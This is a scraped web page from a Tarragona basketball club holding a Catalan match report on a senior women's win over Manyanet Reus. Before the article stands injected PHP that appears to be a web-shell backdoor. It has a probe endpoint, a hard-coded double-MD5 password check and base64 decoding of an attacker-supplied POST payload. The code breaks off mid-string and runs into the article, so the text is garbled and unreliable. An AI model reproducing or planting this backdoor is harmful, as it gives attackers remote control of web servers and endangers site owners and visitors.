function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El sènior femení manté el cap fred tot i l'encert inicial rival des del perímetre i guanya el Manyanet Reus (71-51) - Tgn Bàsquet Club -

El sènior femení manté el cap fred tot i l’encert inicial rival des del perímetre i guanya el Manyanet Reus (71-51)

Updated: octubre 6, 2019

Dos de dos. L’equip sènior femení del TGN Bàsquet va aconseguir el segon triomf de la temporada després de dos partits de lliga. El conjunt que entrena Víctor Neila va saber jugar amb el cap fred tot i anar a remolc en el primer període i es va endur un triomf treballat però també contundent, un fet que mostra la solidesa del grup lila. El Manyanet de Reus va jugar sense complexos, molt desinhibit en atac, imposant la llei del triple en els dos primers quarts quan va ser capaç d’anotar cinc llançaments de tres punts dels sis que va convertir en total al final del partit. Al final, les tarragonines, regulars i precises com un rellotge suís, van anar fent la seva feina, al seu ritme i després de capgirar el resultat primer, van ser capaces d’obrir una escletxa que van anar eixamplant a mesura que s’entonaven en atac. Així van arribar els sis triples, que van ser decisius per a tancar el partit.

De menys a més

Admetia el tècnic local Víctor Neila al final del partit que eren conscients que el Manyanet de Reus era un equip perillós des de la línia de tres punts i que havien d’estar preparats (el cos tècnic i les jugadores) per assumir aquest aspecte del joc rival. I així va ser. Les reusenques van dur la batuta del matx gràcies a la punteria en els primers dos períodes, anotat tres triples en el primer quart i dos en el segon. A l’equador del primer període les visitants havien marxat per set punts 3-10 i sort que un dos més un de Laura Vilamajor refredava els ànims visitants perquè la confiança del Manyanet anava en augment gràcies a l’encert. El TGN Bàsquet sabia que necessitava activitat defensiva per contrarestar l’estat de gràcia rival i aquesta solidesa va permetre les tarragonines capgirar la dinàmica amb el pas dels minuts. Mentrestant, 15-17 al final del primer quart triple rival inclòs al llindar de la botzina.

El segon període va començar d’igual manera que va acabar el primer, amb un triple del Manyanet i un altre encert des de la línia de tres punts de les reusenques gairebé seguit obligava Neila a demanar temps mort (17-23 a 7:04 pel descans). La sagnia visitant es va tallar gràcies a un triple local, de la júnior Mariona Rovira, que escurçava les distàncies (20-23). Això va engrescar les locals que van començar a jugar amb  més fluïdesa ofensiva i en un tres i no res van situar un 30-23 al marcador (a 2:18 pel descans) després d’un parcial de 13-0, triple de Laura Vilamajor (2 en total) inclòs. El Manyanet va demanar temps mort i el resultat a la mitja part era de 33-27.

El TGN Bàsquet havia fet el més difícil, tallar la inspiració visitant i obrir un petit forat que li atorgués seguretat en el joc. Des d’aquí i fins al final del partit, les diferències sempre (o gairebé sempre) van rondar els deu punts  —39-29 a 5:48 pel final del 3Q— gràcies a dos triples seguits de Llanos i Laura Vilamajor en el tram final del període —sobretot el de la gran de les Vilamajor, gairebé sobre la botzina—.

Els últims deu minuts van servir per a refermar la superioritat local. Dos triples seguits, un altre de Llanos i un d’Ona Fort, deixaven el marcador en 57-44 a 7:45 del final del matx. Les tarragonines ja jugaven més de pressa, sense tantes imprecisions i, sobretot, amb més confiança en atac i les diferències van arribar a ser de fins a 17 punts (66-49 a dos minuts del final). Una cistella de Vadillo també sobre la botzina va deixar el marcador en 71-51, la màxima diferència de tot el partit.